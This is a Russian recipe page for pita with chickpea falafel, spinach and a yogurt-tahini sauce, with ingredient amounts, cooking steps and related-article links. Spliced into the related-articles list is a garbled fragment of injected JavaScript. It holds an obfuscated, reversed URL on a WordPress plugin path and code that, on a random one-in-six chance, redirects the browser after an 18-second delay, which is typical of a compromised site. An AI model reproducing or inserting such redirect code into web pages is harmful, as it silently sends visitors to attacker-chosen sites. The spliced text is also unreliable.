Как на городских фестивалях еды, только вкуснее. Эти питы с классическим ближневосточным фалафелем, заправленные вкусным соусом, — настоящее объедение!
420 calories
Пита с фалафелем и йогуртным тахини
Сытные вегетарианские сэндвичи с обжаренными шариками из измельчённого нута.
Пита с фалафелем и йогуртным тахини
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
90 минут
PT1H30M
PT1H30M
КОЛИЧЕСТВО ПОРЦИЙ:
4 порции
КАЛОРИЙНОСТЬ:
420 ккал
Сложность
Время
90 минут
Кол-во порций
4 порции
Калорийность
420 ккал
Ингредиенты
Нут (сухой)
1 стакан
Лепёшка (пита)
2 шт.
Лук (репчатый)
1 шт.
Лук (шалот)
1 шт.
Чеснок
3 зубчика
Шпинат
горсть
Йогурт
½ стакана
Кунжут
2 ст. л.
Вода
2 ст. л.
Тахини
1 ст. л.
Лимон (сок)
1 ст. л.
Кумин
1 ч. л.
Разрыхлитель
½ ч. л.
Процесс приготовления
- Предварительно замочите нут на ночь. Утром слейте воду.
- Отварите нут в течение 50 минут.
- Смешайте варёный нут в комбайне или блендере с нарезанным репчатым луком, кунжутом, кумином, разрыхлителем и чесноком.
- Сформируйте из этой массы шарики и обжарьте их на сковороде в течение 5 минут с разных сторон.
- Приготовьте соус: смешайте в блендере йогурт, тахини и сок лимона.
- Разрежьте питы пополам и положите внутрь каждой половинки пару фалафелей.
- Добавьте в каждую питу соус, нарезанный лук-шалот и свежий шпинат. Приятного аппетита!
Статьи по теме
Как приготовить вкусный фалафель
Как готовить самый правильный хумус
Как приготовить полезный гирос по рецепту fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
Рецепт дня: веганский хот-дог